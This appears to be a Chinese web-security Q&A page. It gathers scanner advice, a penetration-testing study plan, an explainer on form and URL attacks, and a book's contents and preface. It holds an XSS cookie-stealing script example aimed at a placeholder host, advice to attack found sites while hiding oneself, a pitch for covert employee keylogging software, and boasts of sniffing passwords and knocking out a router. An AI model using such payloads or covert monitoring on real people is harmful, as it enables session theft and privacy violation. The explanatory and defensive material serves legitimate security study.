㈠ WEB伺服器安全滲透性測試方案
http://hi..com/zh2089/blog/category/%B1%BE%C8%CB%D4%AD%B4%B4
本人博客的幾篇原創文章,裡面有一些實例,LZ覺得可以的話請給最佳答案
㈡ 前端和php都是要學習什麼內容,急急急,求詳細解答
前端技術 HTNL+CSS+html5+css3+javascript+jquery+前端框架
作圖工具 photoshop
編碼工具 看自己喜歡
資料庫 Mysql Sqlserver 等
程序語言 PHP ASP.NET JSP
㈢ 上網行為管理有多少功能啊
iMonitor EAM電腦監控軟體,可以全方位監控員工電腦上的行為,客戶端隱蔽啟動,運行穩定,佔用低,支持多屏幕實時桌面監控和遠程式控制制,可以屏幕截圖記錄軟體使用、聊天內容、文件操作、鍵盤輸入內容、網站訪問等員工的工作情況,還具備關鍵字檢測、記錄和禁止文件傳輸、USB設備使用,保護文檔資料安全;黑名單可以禁止指定的網頁和軟體的使用,阻止員工上班期間,玩游戲刷淘寶等;報表統計功能可以統計分析員工電腦工作情況,從而制定更有效的管理措施,提高員工的工作效率
㈣ 比較好的web安全掃描工具有哪些
隨著網站業務所承載內容的日益增多且重要性日益增強,網站本身的價值也越來越大,隨之由網站漏洞帶來的安全性問題也愈發嚴峻。新開通網站、新增專欄的准入質量評估,網站系統日常運行狀況的檢查預防和風險掌控,這些已成為各行業每年安全大檢查中的關鍵要素。作為具體落實定期檢查工作的安全人員,也急需選擇一款優秀的網站掃描產品進行高效徹底的Web脆弱性評估檢查,而如何選擇一款真正實用的產品成為一個比較糾結的難題。
常見Web掃描方案的優劣勢
目前常見的支持Web掃描解決方案的產品有很多,大家比較熟悉的有集成Web掃描模塊的多合一系統掃描器,網上可免費下載的開源掃描器軟體以及近幾年剛嶄露頭角的獨立Web掃描器產品等,都可以進行一定程度的Web安全掃描和漏洞發現。那麼面對如此琳琅滿目的選擇時,大家如何細致區分辨識其差異,就需嚴格立足於實際需要,最終做出最佳的判斷。
多合一的系統掃描器,通常會集主機掃描、配置核查、Web掃描及弱口令掃描於一身,是一款強大全面的多功能產品。但多合一的高度封裝導致其在進行安全掃描時,除不能分配全部計算資源在Web掃描方面,掃描引擎自身還要兼顧到全方位的權衡與調優。反觀目標Web應用呈現的種類多樣性、規模龐大性和運行特殊性,在面對動輒上萬、十萬甚至百萬級別網頁數量的網站時,這種多合一產品就表現得差強人意,使用起來有種牛拉火車的感覺;同時,高效執行掃描評估就必須具備高並發的網頁鏈接爬蟲識別和Web插件交互邏輯判斷能力,這一現實的沖突導致多合一掃描器在Web掃描及性能體驗方面效果平平,優勢不突出。
網上開源的Web掃描器軟體,盡管完全免費並可以發現一些基本的漏洞信息,但其在第一時間發現新爆Web漏洞和漏洞趨勢跟蹤分析、修補方面,完全不具備後期支撐能力。而且在人性化設計及低學習門檻方面也存在太多先天的不足,其性能與穩定性更是與商業軟體相差甚遠。
面對綜上同類產品,困惑於Web掃描場景需求種種局限的我們,很欣喜地看到了近幾年聲名鵲起的Web掃描器產品。它作為一款自動化評估類工具,依據制定的策略對Web應用系統進行URL深度發現並全面掃描,尋找出Web應用真實存在的安全漏洞,如跨站點腳本、SQL注入,命令執行、目錄遍歷和不安全的伺服器配置。Web掃描器產品可以通過主動生成統計分析報告來幫助我們正確了解Web應用漏洞的詳細分布、數量和風險優先順序,並對發現的安全漏洞提出相應有力的改進意見供後續修補參考,是幫助我們高效徹底地進行Web脆弱性評估檢查的堅實利器。
Web掃描器的三個誤區
針對現有市面上諸多品牌的Web掃描器,大家在評價它們孰優孰劣時時常過於片面極端,主要表現為三個認識誤區。
誤區1:多就是好!
認為漏洞庫條目多,檢查出來的漏洞多就是好。Web掃描器面對龐大繁多、千差萬別的應用系統,為提升檢測性能,多採用高效率的Web通用插件,以一掃多,其不再局限於某個專門應用系統,深層次聚合歸並,盡可能多地發現多種應用系統的同類漏洞。同時,對於掃描出來的非誤報漏洞,若同屬某一頁面不同參數所致的相同漏洞,歸納整理,讓最終呈現的漏洞報表簡約而不簡單,避免數量冗餘、雜亂無章。故若以毫無插件歸並能力,僅靠大量專門Web系統插件、羅列各類漏洞列表數量多來博取贊許的Web掃描器,其本質存在太多的不專業性。
誤區2:快就是好!
認為掃描速度快耗時短的就是好。網站規模日趨復雜,日常檢查時我們期待Web掃描器能有更高效率地完成掃描任務,這點無可厚非,但檢查的本質是要最大限度地提前發現足夠多的漏洞,並第一時間制定後續相應的修補計劃。故在面對同一目標站點時,Web掃描器若能在單位時間內檢測出來的有效存在漏洞數越多,這個快才是真的好。
誤區3:小就是好!
認為掃描過程中對目標業務影響小就是好!這句話本身也沒有問題,只要Web掃描器在執行掃描過程中,對目標系統負載響應和網路鏈路帶寬佔用,影響足夠小,也就是我們常說的「無損掃描」,它就具備了一款優秀Web掃描器應有的先決條件。但是,這必須是在能最大限度發現Web漏洞的前提下才能考慮的關鍵因素,脫離這個產品本質,就本末倒置了。
五個基本評優標准
那麼,評優一款Web掃描器,我們該從何處著手?具體的判斷標准有哪些呢?
全——識別種類繁多的Web應用,集成最全的Web通用插件,通過全面識別網站結構和內容,逐一判斷每一種漏洞可能性,換句話說,漏洞掃描的檢測率一定要高,漏報率務必低,最終才能輸出全面詳盡的掃描報告。這就要求其在Web應用識別方面,支持各類Web語言類型(php、asp、.net、html)、應用系統類型(門戶網站、電子政務、論壇、博客、網上銀行)、應用程序類型(IIS、Apache、Tomcat)、第三方組件類型(Struts2、WebLogic、WordPress)等;插件集成方面,支持國際標准漏洞分類OWASP TOP 10和WASC插件分類模板,允許自定義掃描插件模板,第一時間插件更新速度等。
准——較高的漏洞准確性是Web掃描器權威的象徵,可視化分析可助用戶准確定位漏洞、分析漏洞。而誤報是掃描類產品不能迴避的話題。Web掃描器通過通用插件與目標站點任一URL頁面進行邏輯交互,通過可視化的漏洞跟蹤技術,精準判斷和定位漏洞,並提供易讀易懂的詳細整改分析報告。除此之外,一款好的Web掃描器還要更具人性化,在漏洞發現後,允許掃描者進行手工、自動的漏洞批量驗證,進而雙重保障較高的准確性結果。
快——快速的掃描速度,才能在面對越來越大的網站規模,越發頻繁的網站檢查時游刃有餘,進度保障。一款快速的Web掃描器除了有強勁馬力的掃描引擎,高達百萬/天的掃描速度,還要具備彈性靈活的集群掃描能力,任意增添掃描節點,輕松應對可能苛刻的掃描周期時間要求。
穩——穩定可靠的運行過程,對目標環境近乎零影響的Web掃描器,才能在諸行業大面積投入使用,特別是一些對業務影響要求苛刻的行業會更受青睞,畢竟沒有人能夠接受一款評估類產品,會對目標造成額外的損傷。市面上現在已有一些Web掃描器產品,其通過周期探尋目標系統,網路鏈路,自身性能負載等機制,依據目標環境的負載動態變化而自動調節掃描參數,從而保障掃描過程的足夠穩定和幾乎零影響。此外,隨著網站規模,檢查范圍的不斷擴大,保證持續穩定的掃描執行和統計評估,盡量避免掃描進度的半途而廢,也提出了較高的可靠性運行要求。
易——人性化的界面配置,低成本的報表學習和強指導性修補建議。尤其是漏洞分布詳情和場景重現方面,市面上大多數Web掃描器的報表都需要專業安全人員的二次解讀後,普通的安全運維檢查人員才能看懂,才知道長達百頁報表給出的重要建議和下一步的具體修補措施,這無疑給使用者造成了較高的技術門檻,那麼如何解決此易讀、易用問題,就成為評定其優劣與否的一個重要指標。
總之,一款優秀的Web掃描器產品,它需要嚴格恪守五字核心方針,全、准、快、穩、易,做到全方位均衡,這樣才能做到基本優秀。同時,隨著網站檢查訴求的日益多元化,它若能附帶一些差異化特性,滿足大家不同場景的網站安全運維掃描要求,如網站基本信息搜集,漏洞全過程時間軸跟蹤,逐步可視化的漏洞驗證和場景重現,自動修補直通車等,定會大大增加該款掃描器的評優力度。
㈤ 本人信息安全大一新生,想走web安全的滲透路線,需要完成什麼知識儲備希望前輩給點建議,謝謝。
作者:向生李
鏈接:https://www.hu.com/question/21914899/answer/39344435
來源:知乎
著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請註明出處。
Web安全工程師
Web安全相關概念
熟悉基本概念(SQL注入、上傳、XSS、CSRF、一句話木馬等)。通過關鍵字(SQL注入、上傳、XSS、CSRF、一句話木馬等)進行Google/SecWiki;
閱讀《精通腳本黑客》,雖然很舊也有錯誤,但是入門還是可以的;
看一些滲透筆記/視頻,了解滲透實戰的整個過程,可以Google(滲透筆記、滲透過程、入侵過程等);
3周
熟悉滲透相關工具
熟悉AWVS、sqlmap、Burp、nessus、chopper、nmap、Appscan等相關工具的使用。了解該類工具的用途和使用場景,先用軟體名字Google/SecWiki;
下載無後們版的這些軟體進行安裝;
學習並進行使用,具體教材可以在SecWiki上搜索,例如:Brup的教程、sqlmap;
待常用的這幾個軟體都學會了可以安裝音速啟動做一個滲透工具箱;
5周
滲透實戰操作
掌握滲透的整個階段並能夠獨立滲透小型站點。網上找滲透視頻看並思考其中的思路和原理,關鍵字(滲透、SQL注入視頻、文件上傳入侵、資料庫備份、dedecms漏洞利用等等);
自己找站點/搭建測試環境進行測試,記住請隱藏好你自己;
思考滲透主要分為幾個階段,每個階段需要做那些工作,例如這個:PTES滲透測試執行標准;
研究SQL注入的種類、注入原理、手動注入技巧;
研究文件上傳的原理,如何進行截斷、雙重後綴欺騙(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,參照:上傳攻擊框架;
研究XSS形成的原理和種類,具體學習方法可以Google/SecWiki,可以參考:XSS;
研究Windows/Linux提權的方法和具體使用,可以參考:提權;
可以參考: 開源滲透測試脆弱系統;
1周
關注安全圈動態
關注安全圈的最新漏洞、安全事件與技術文章。通過SecWiki瀏覽每日的安全技術文章/事件;
通過Weibo/twitter關注安全圈的從業人員(遇到大牛的關注或者好友果斷關注),天天抽時間刷一下;
通過feedly/鮮果訂閱國內外安全技術博客(不要僅限於國內,平時多注意積累),沒有訂閱源的可以看一下SecWiki的聚合欄目;
養成習慣,每天主動提交安全技術文章鏈接到SecWiki進行積淀;
多關注下最新漏洞列表,推薦幾個:exploit-db、CVE中文庫、Wooyun等,遇到公開的漏洞都去實踐下。
關注國內國際上的安全會議的議題或者錄像,推薦SecWiki-Conference。
3周
熟悉Windows/Kali Linux
學習Windows/Kali Linux基本命令、常用工具;熟悉Windows下的常用的cmd命令,例如:ipconfig,nslookup,tracert,net,tasklist,taskkill等;
熟悉Linux下的常用命令,例如:ifconfig,ls,cp,mv,vi,wget,service,sudo等;
熟悉Kali Linux系統下的常用工具,可以參考SecWiki,《Web Penetration Testing with Kali Linux》、《Hacking with Kali》等;
熟悉metasploit工具,可以參考SecWiki、《Metasploit滲透測試指南》。
3周
伺服器安全配置
學習伺服器環境配置,並能通過思考發現配置存在的安全問題。Windows2003/2008環境下的IIS配置,特別注意配置安全和運行許可權,可以參考:SecWiki-配置;
Linux環境下的LAMP的安全配置,主要考慮運行許可權、跨目錄、文件夾許可權等,可以參考:SecWiki-配置;
遠程系統加固,限制用戶名和口令登陸,通過iptables限制埠;
配置軟體Waf加強系統安全,在伺服器配置mod_security等系統,參見SecWiki-ModSecurity;
通過Nessus軟體對配置環境進行安全檢測,發現未知安全威脅。
4周
腳本編程學習
選擇腳本語言Perl/Python/PHP/Go/Java中的一種,對常用庫進行編程學習。搭建開發環境和選擇IDE,PHP環境推薦Wamp和XAMPP,IDE強烈推薦Sublime,一些Sublime的技巧:SecWiki-Sublime;
Python編程學習,學習內容包含:語法、正則、文件、網路、多線程等常用庫,推薦《Python核心編程》,不要看完;
用Python編寫漏洞的exp,然後寫一個簡單的網路爬蟲,可參見SecWiki-爬蟲、視頻;
PHP基本語法學習並書寫一個簡單的博客系統,參見《PHP與MySQL程序設計(第4版)》、視頻;
熟悉MVC架構,並試著學習一個PHP框架或者Python框架(可選);
了解Bootstrap的布局或者CSS,可以參考:SecWiki-Bootstrap;
3周
源碼審計與漏洞分析
能獨立分析腳本源碼程序並發現安全問題。熟悉源碼審計的動態和靜態方法,並知道如何去分析程序,參見SecWiki-審計;
從Wooyun上尋找開源程序的漏洞進行分析並試著自己分析;
了解Web漏洞的形成原因,然後通過關鍵字進行查找分析,參見SecWiki-代碼審計、高級PHP應用程序漏洞審核技術;
研究Web漏洞形成原理和如何從源碼層面避免該類漏洞,並整理成checklist。
5周
安全體系設計與開發
能建立自己的安全體系,並能提出一些安全建議或者系統架構。開發一些實用的安全小工具並開源,體現個人實力;
建立自己的安全體系,對公司安全有自己的一些認識和見解;
提出或者加入大型安全系統的架構或者開發;
看自己發展咯~
㈥ 什麼是url攻擊,瀏覽網頁時殺軟提示攔截url攻擊,url攻擊是什麼樣的,被
有時候程序員為了偷懶或者是在無意識的情況下缺少了對外部數據的過濾,Web安全習慣上將所有用戶輸入的數據假定為受污染的數據(即可能帶有攻擊性的數據),現在比較流行的XSS(跨站腳本攻擊)就是利用對用戶輸入過濾不完全而進行的攻擊,因為用戶數據過濾不完全會導致很多很多問題,我這里只是簡單的介紹幾種比較常見的表單及URL攻擊方式,希望讀者能夠最大限度的注意過濾用戶輸入。
1)表單數據泄漏攻擊
這個一般剛入行的人可能會犯錯,說得通俗一點,就是該用POST方式提交數據的時候,用了GET方式提交數據,比如,用戶登錄時候用了GET方法,導致用戶名和密碼都在URL上直接顯示出來了,當然假如真的傻到這種程度,這種應用大多還是屬於自己玩玩的東西,不是產品。還有一種是登錄等操作,在提交數據的時候被竊聽或者攔截了,這種沒有很好的方式去解決,最多就是利用可以在瀏覽器上執行的腳本,比如JavaScript對密碼和用戶加密後提交到伺服器,而且最好採用不可逆的公共演算法,在瀏覽器端執行的腳本如果使用自己的演算法,會增加被破解的幾率,當然如果你的加密程度能超過或者接近現在流行的公共加密演算法,那麼也是可以的:)
2)語義URL攻擊
這也是利用提交的形式及參數進行攻擊的,假如使用GET方式找回密碼,url為:http://example.org/[email protected],那麼產生的攻擊也很簡單,只要將user=abc改成任意其他的存在的用戶密碼就會發到後面的email中,輕松獲取別人密碼,POST方式大體也是通過竊聽方式獲得提交的數據
3)文件上傳攻擊
文件上傳造成的危害在表單攻擊中是最大的,假如成功入侵,最壞的情況甚至是可以干任何想乾的事情,因此對此不可小覷。常見的有大文件攻擊,假如你的服務端沒有做限制的話,那麼你的硬碟很快就會被塞滿,或者是你在客戶端中只是簡單的限制了一下,那些對於心懷不軌者都是擺設,太容易繞開了。假如上傳的是一個可執行的腳本,在某種情況下會激活這個腳本,那麼後果就不堪設想,驗證上傳文件的後綴和限制上傳文件的種類是能避免大多數低級別的攻擊者,但根本還是讓存放用戶上傳的文件的目錄沒有執行許可權,腳本不能執行,那麼它也僅僅是一般文本而已。
4)跨站腳本攻擊
跨站腳本攻擊是眾所周知的攻擊方式之一。所有平台上的Web應用都深受其擾,PHP應用也不例外。
所有有輸入的應用都面臨著風險。Webmail,論壇,留言本,甚至是Blog。事實上,大多數Web應用提供輸入是出於更吸引人氣的目的,但同時這也會把自己置於危險之中。如果輸入沒有正確地進行過濾和轉義,跨站腳本漏洞就產生了。
比如在一個博客平台提供商,一個心懷不軌的用戶在寫博客時故意在內容中插入<script> document.location = 』http://abc.example.org/steal.php?cookies=』 + document.cookie</script>,結果所有瀏覽這篇文章的讀者的Cookie信息都在不知情的情況下發給了第三方。
5)HTTP請求欺騙攻擊
所謂上有政策下有對策,很多項目為了最大程度的得到高可信度的用戶輸入,甚至添加了判斷referer的功能,可惜這個東西十分的不靠譜,隨便一個CURL就可以欺騙過去。
畢竟所有的傳輸都只是個協議而已,而HTTP協議本身只是負責傳輸,並不負責諸如安全之類的其他問題,所以過程怎麼偽造都是可以的,只要攻擊者足夠的熟悉HTTP協議,針對HTTP協議本身的攻擊,似乎目前還沒有看到,雖然欺騙、攻擊隨處可見,方式變化多樣,只要做好了過濾,多想一點再多想一點,任何攻擊得到的都是一個錯誤頁面而已
㈦ 白帽子講wed安全的書有效果嗎
在互聯網時代,數據安全與個人隱私受到了前所未有的挑戰,各種新奇的攻擊技術層出不窮。如何才能更好地保護我們的數據?本書將帶你走進web安全的世界,讓你了解web安全的方方面面。黑客不再變得神秘,攻擊技術原來我也可以會,小網站主自己也能找到正確的安全道路。大公司是怎麼做安全的,為什麼要選擇這樣的方案呢?你能在本書中找到答案。詳細的剖析,讓你不僅能「知其然」,更能「知其所以然」。
《白帽子講web安全》是根據作者若干年實際工作中積累下來的豐富經驗而寫成的,在解決方案上具有極強的可操作性,深入分析了各種錯誤的解決方案與誤區,對安全工作者有很好的參考價值。安全開發流程與運營的介紹,對同行業的工作具有指導意義。
編輯推薦
「安全是互聯網公司的生命,也是每一位網民的最基本需求。
一位天天聽到炮聲的白帽子和你分享如何呵護生命,滿足最基本需求。這是一本能聞到硝煙味道的書。」
——阿里巴巴集團首席架構師 阿里雲總裁 王堅
白帽子講web安全 作譯者:
吳翰清,畢業於西安交通大學少年班,從2000年開始研究網路攻防技術。在大學期間創立
了在中國安全圈內極具影響力的組織「幻影」。
2005年加入********,負責網路安全。工作期間,對********的安全開發流程、應用安全建設做出了傑出的貢獻,並多次獲得公司的表彰。曾先後幫助淘寶、支付寶建立了應用安全體系,保障公司業務得以快速而安全地發展。
2009年起,加入********支計算有限公司,負責雲計算安全、反網路欺詐等工作,是********集團最具價值的安全專家。長期專注於安全技術的創新與實踐,多有建樹。同時還是owasp在中國的區域負責人之一,在互聯網安全領域有著極其豐富的經驗。平時樂於分享,個人博客的訪問量迄今超過200萬。多年來活躍在安全社區中,有著巨大的影響力。多次受邀在國內、國際安全會議上演講,是中國安全行業的領軍人物之一。
白帽子講web安全 目錄:
第一篇 世界觀安全
第1章 我的安全世界觀 2
1.1 web安全簡史 2
1.1.1 中國黑客簡史 2
1.1.2 黑客技術的發展歷程 3
1.1.3 web安全的興起 5
1.2 黑帽子,白帽子 6
1.3 返璞歸真,揭秘安全的本質 7
1.4 破除迷信,沒有銀彈 9
1.5 安全三要素 10
1.6 如何實施安全評估 11
1.6.1 資產等級劃分 12
1.6.2 威脅分析 13
1.6.3 風險分析 14
1.6.4 設計安全方案 15
1.7 白帽子兵法 16
1.7.1 secure by default原則 16
1.7.2 縱深防禦原則 18
1.7.3 數據與代碼分離原則 19
.1.7.4 不可預測性原則 21
1.8 小結 22
(附)誰來為漏洞買單? 23
第二篇 客戶端腳本安全
第2章 瀏覽器安全 26
2.1 同源策略 26
2.2 瀏覽器沙箱 30
2.3 惡意網址攔截 33
2.4 高速發展的瀏覽器安全 36
2.5 小結 39
第3章 跨站腳本攻擊(xss) 40
3.1 xss簡介 40
3.2 xss攻擊進階 43
3.2.1 初探xss payload 43
3.2.2 強大的xss payload 46
3.2.3 xss 攻擊平台 62
3.2.4 終極武器:xss worm 64
3.2.5 調試javascript 73
3.2.6 xss構造技巧 76
3.2.7 變廢為寶:mission impossible 82
3.2.8 容易被忽視的角落:flash xss 85
3.2.9 真的高枕無憂嗎:javascript開發框架 87
3.3 xss的防禦 89
3.3.1 四兩撥千斤:httponly 89
3.3.2 輸入檢查 93
3.3.3 輸出檢查 95
3.3.4 正確地防禦xss 99
3.3.5 處理富文本 102
3.3.6 防禦dom based xss 103
3.3.7 換個角度看xss的風險 107
3.4 小結 107
第4章 跨站點請求偽造(csrf) 109
4.1 csrf簡介 109
4.2 csrf進階 111
4.2.1 瀏覽器的cookie策略 111
4.2.2 p3p頭的副作用 113
4.2.3 get? post? 116
4.2.4 flash csrf 118
4.2.5 csrf worm 119
4.3 csrf的防禦 120
4.3.1 驗證碼 120
4.3.2 referer check 120
4.3.3 anti csrf token 121
4.4 小結 124
第5章 點擊劫持(clickjacking) 125
5.1 什麼是點擊劫持 125
5.2 flash點擊劫持 127
5.3 圖片覆蓋攻擊 129
5.4 拖拽劫持與數據竊取 131
5.5 clickjacking 3.0:觸屏劫持 134
5.6 防禦clickjacking 136
5.6.1 frame busting 136
5.6.2 x-frame-options 137
5.7 小結 138
第6章 html 5 安全 139
6.1 html 5新標簽 139
6.1.1 新標簽的xss 139
6.1.2 iframe的sandbox 140
6.1.3 link types: noreferrer 141
6.1.4 canvas的妙用 141
6.2 其他安全問題 144
6.2.1 cross-origin resource sharing 144
6.2.2 postmessage——跨窗口傳遞消息 146
6.2.3 web storage 147
6.3 小結 150
第三篇 伺服器端應用安全
第7章 注入攻擊 152
7.1 sql注入 152
7.1.1 盲注(blind injection) 153
7.1.2 timing attack 155
7.2 資料庫攻擊技巧 157
7.2.1 常見的攻擊技巧 157
7.2.2 命令執行 158
7.2.3 攻擊存儲過程 164
7.2.4 編碼問題 165
7.2.5 sql column truncation 167
7.3 正確地防禦sql注入 170
7.3.1 使用預編譯語句 171
7.3.2 使用存儲過程 172
7.3.3 檢查數據類型 172
7.3.4 使用安全函數 172
7.4 其他注入攻擊 173
7.4.1 xml注入 173
7.4.2 代碼注入 174
7.4.3 crlf注入 176
7.5 小結 179
第8章 文件上傳漏洞 180
8.1 文件上傳漏洞概述 180
8.1.1 從fckeditor文件上傳漏洞談起 181
8.1.2 繞過文件上傳檢查功能 182
8.2 功能還是漏洞 183
8.2.1 apache文件解析問題 184
8.2.2 iis文件解析問題 185
8.2.3 php cgi路徑解析問題 187
8.2.4 利用上傳文件釣魚 189
8.3 設計安全的文件上傳功能 190
8.4 小結 191
第9章 認證與會話管理 192
9.1 who am i? 192
9.2 密碼的那些事兒 193
9.3 多因素認證 195
9.4 session與認證 196
9.5 session fixation攻擊 198
9.6 session保持攻擊 199
9.7 單點登錄(sso) 201
9.8 小結 203
第10章 訪問控制 205
10.1 what can i do? 205
10.2 垂直許可權管理 208
10.3 水平許可權管理 211
10.4 oauth簡介 213
10.5 小結 219
第11章 加密演算法與隨機數 220
11.1 概述 220
11.2 stream cipher attack 222
11.2.1 reused key attack 222
11.2.2 bit-flipping attack 228
11.2.3 弱隨機iv問題 230
11.3 wep破解 232
11.4 ecb模式的缺陷 236
11.5 padding oracle attack 239
11.6 密鑰管理 251
11.7 偽隨機數問題 253
11.7.1 弱偽隨機數的麻煩 253
11.7.2 時間真的隨機嗎 256
11.7.3 破解偽隨機數演算法的種子 257
11.7.4 使用安全的隨機數 265
11.8 小結 265
(附)understanding md5 length extension attack 267
第12章 web框架安全 280
12.1 mvc框架安全 280
12.2 模板引擎與xss防禦 282
12.3 web框架與csrf防禦 285
12.4 http headers管理 287
12.5 數據持久層與sql注入 288
12.6 還能想到什麼 289
12.7 web框架自身安全 289
12.7.1 struts 2命令執行漏洞 290
12.7.2 struts 2的問題補丁 291
12.7.3 spring mvc命令執行漏洞 292
12.7.4 django命令執行漏洞 293
12.8 小結 294
第13章 應用層拒絕服務攻擊 295
13.1 ddos簡介 295
13.2 應用層ddos 297
13.2.1 cc攻擊 297
13.2.2 限制請求頻率 298
13.2.3 道高一尺,魔高一丈 300
13.3 驗證碼的那些事兒 301
13.4 防禦應用層ddos 304
13.5 資源耗盡攻擊 306
13.5.1 slowloris攻擊 306
13.5.2 http post dos 309
13.5.3 server limit dos 310
13.6 一個正則引發的血案:redos 311
13.7 小結 315
第14章 php安全 317
14.1 文件包含漏洞 317
14.1.1 本地文件包含 319
14.1.2 遠程文件包含 323
14.1.3 本地文件包含的利用技巧 323
14.2 變數覆蓋漏洞 331
14.2.1 全局變數覆蓋 331
14.2.2 extract()變數覆蓋 334
14.2.3 遍歷初始化變數 334
14.2.4 import_request_variables變數覆蓋 335
14.2.5 parse_str()變數覆蓋 335
14.3 代碼執行漏洞 336
14.3.1 「危險函數」執行代碼 336
14.3.2 「文件寫入」執行代碼 343
14.3.3 其他執行代碼方式 344
14.4 定製安全的php環境 348
14.5 小結 352
第15章 web server配置安全 353
15.1 apache安全 353
15.2 nginx安全 354
15.3 jboss遠程命令執行 356
15.4 tomcat遠程命令執行 360
15.5 http parameter pollution 363
15.6 小結 364
第四篇 互聯網公司安全運營
第16章 互聯網業務安全 366
16.1 產品需要什麼樣的安全 366
16.1.1 互聯網產品對安全的需求 367
16.1.2 什麼是好的安全方案 368
16.2 業務邏輯安全 370
16.2.1 永遠改不掉的密碼 370
16.2.2 誰是大贏家 371
16.2.3 瞞天過海 372
16.2.4 關於密碼取迴流程 373
16.3 賬戶是如何被盜的 374
16.3.1 賬戶被盜的途徑 374
16.3.2 分析賬戶被盜的原因 376
16.4 互聯網的垃圾 377
16.4.1 垃圾的危害 377
16.4.2 垃圾處理 379
16.5 關於網路釣魚 380
16.5.1 釣魚網站簡介 381
16.5.2 郵件釣魚 383
16.5.3 釣魚網站的防控 385
16.5.4 網購流程釣魚 388
16.6 用戶隱私保護 393
16.6.1 互聯網的用戶隱私挑戰 393
16.6.2 如何保護用戶隱私 394
16.6.3 do-not-track 396
16.7 小結 397
(附)麻煩的終結者 398
第17章 安全開發流程(sdl) 402
17.1 sdl簡介 402
17.2 敏捷sdl 406
17.3 sdl實戰經驗 407
17.4 需求分析與設計階段 409
17.5 開發階段 415
17.5.1 提供安全的函數 415
17.5.2 代碼安全審計工具 417
17.6 測試階段 418
17.7 小結 420
第18章 安全運營 422
18.1 把安全運營起來 422
18.2 漏洞修補流程 423
18.3 安全監控 424
18.4 入侵檢測 425
18.5 緊急響應流程 428
18.6 小結 430
(附)談談互聯網企業安全的發展方向 431
㈧ 白帽子講Web安全的前言
在2010年年中的時候,博文視點的張春雨先生找到我,希望我可以寫一本關於雲計算安全的書。當時雲計算的概念正如日中天,但市面上關於雲計算安全應該怎麼做卻缺乏足夠的資料。我由於工作的關系接觸這方面比較多,但考慮到雲計算的未來尚未清晰,以及其他的種種原因,婉拒了張春雨先生的要求,轉而決定寫一本關於Web安全的書。 我對安全的興趣起源於中學時期。當時在盜版市場買到了一本沒有書號的黑客手冊,其中coolfire 的黑客教程令我印象深刻。此後在有限的能接觸到互聯網的機會里,我總會想方設法地尋找一些黑客教程,並以實踐其中記載的方法為樂。
在2000年的時候,我進入了西安交通大學學習。在大學期間,最大的收獲,是學校的計算機實驗室平時會對學生開放。當時上網的資費仍然較貴,父母給我的生活費里,除了留下必要的生活所需費用之外,幾乎全部投入在這里。也是在學校的計算機實驗室里,讓我迅速在這個領域中成長起來。
大學期間,在父母的資助下,我擁有了自己的第一台個人電腦,這加快了我成長的步伐。與此同時,我和一些互聯網上志同道合的朋友,一起建立了一個技術型的安全組織,名字來源於我當時最喜愛的一部動漫:「幻影旅團」。歷經十餘載,「幻影」由於種種原因未能得以延續,但它卻曾以論壇的形式培養出了當今安全行業中非常多的頂尖人才。這也是我在這短短二十餘載人生中的最大成就與自豪。
得益於互聯網的開放性,以及我親手締造的良好技術交流氛圍,我幾乎見證了全部互聯網安全技術的發展過程。在前5年,我投入了大量精力研究滲透測試技術、緩沖區溢出技術、網路攻擊技術等;而在後5年,出於工作需要,我把主要精力放在了對Web安全的研究上。 發生這種專業方向的轉變,是因為在2005年,我在一位摯友的推薦下,加入了阿里巴巴。加入的過程頗具傳奇色彩,在面試的過程中主管要求我展示自己的能力,於是我遠程關閉了阿里巴巴內網上游運營商的一台路由設備,導致阿里巴巴內部網路中斷。事後主管立即要求與運營商重新簽訂可用性協議。
大學時期的興趣愛好,居然可以變成一份正經的職業(當時很多大學都尚未開設網路安全的課程與專業),這使得我的父母很震驚,同時也更堅定了我自己以此作為事業的想法。
在阿里巴巴我很快就嶄露頭角,曾經在內網中通過網路嗅探捕獲到了開發總監的郵箱密碼;也曾經在壓力測試中一瞬間癱瘓了公司的網路;還有好幾次,成功獲取到了域控伺服器的許可權,從而可以以管理員的身份進入任何一位員工的電腦。
但這些工作成果,都遠遠比不上那厚厚的一摞網站安全評估報告讓我更有成就感,因為我知道,網站上的每一個漏洞,都在影響著成千上萬的用戶。能夠為百萬、千萬的互聯網用戶服務,讓我倍感自豪。當時,Web正在逐漸成為互聯網的核心,Web安全技術也正在興起,於是我義無返顧地投入到對Web安全的研究中。
我於2007年以23歲之齡成為了阿里巴巴集團最年輕的技術專家。雖未有官方統計,但可能也是全集團里最年輕的高級技術專家,我於2010年獲此殊榮。在阿里巴巴,我有幸見證了安全部門從無到有的建設過程。同時由於淘寶、支付寶草創,尚未建立自己的安全團隊,因此我有幸參與了淘寶、支付寶的安全建設,為他們奠定了安全開發框架、安全開發流程的基礎。 當時,我隱隱地感覺到了互聯網公司安全,與傳統的網路安全、信息安全技術的區別。就如同開發者會遇到的挑戰一樣,有很多問題,不放到一個海量用戶的環境下,是難以暴露出來的。由於量變引起質變,所以管理10台伺服器,和管理1萬台伺服器的方法肯定會有所區別;同樣的,評估10名工程師的代碼安全,和評估1000名工程師的代碼安全,方法肯定也要有所不同。
互聯網公司安全還有一些鮮明的特色,比如注重用戶體驗、注重性能、注重產品發布時間,因此傳統的安全方案在這樣的環境下可能完全行不通。這對安全工作提出了更高的要求和更大的挑戰。
這些問題,使我感覺到,互聯網公司安全可能會成為一門新的學科,或者說應該把安全技術變得更加工業化。可是我在書店中,卻發現安全類目的書,要麼是極為學術化的(一般人看不懂)教科書,要麼就是極為娛樂化的(比如一些「黑客工具說明書」類型的書)說明書。極少數能夠深入剖析安全技術原理的書,以我的經驗看來,在工業化的環境中也會存在各種各樣的問題。
這些問題,也就促使我萌發了一種寫一本自己的書,分享多年來工作心得的想法。它將是一本闡述安全技術在企業級應用中實踐的書,是一本大型互聯網公司的工程師能夠真正用得上的安全參考書。因此張春雨先生一提到邀請我寫書的想法時,我沒有做過多的思考,就答應了。
Web是互聯網的核心,是未來雲計算和移動互聯網的最佳載體,因此Web安全也是互聯網公司安全業務中最重要的組成部分。我近年來的研究重心也在於此,因此將選題范圍定在了Web安全。但其實本書的很多思路並不局限於Web安全,而是可以放寬到整個互聯網安全的方方面面之中。
掌握了以正確的思路去看待安全問題,在解決它們時,都將無往而不利。我在2007年的時候,意識到了掌握這種正確思維方式的重要性,因此我告知好友:安全工程師的核心競爭力不在於他能擁有多少個0day,掌握多少種安全技術,而是在於他對安全理解的深度,以及由此引申的看待安全問題的角度和高度。我是如此想的,也是如此做的。
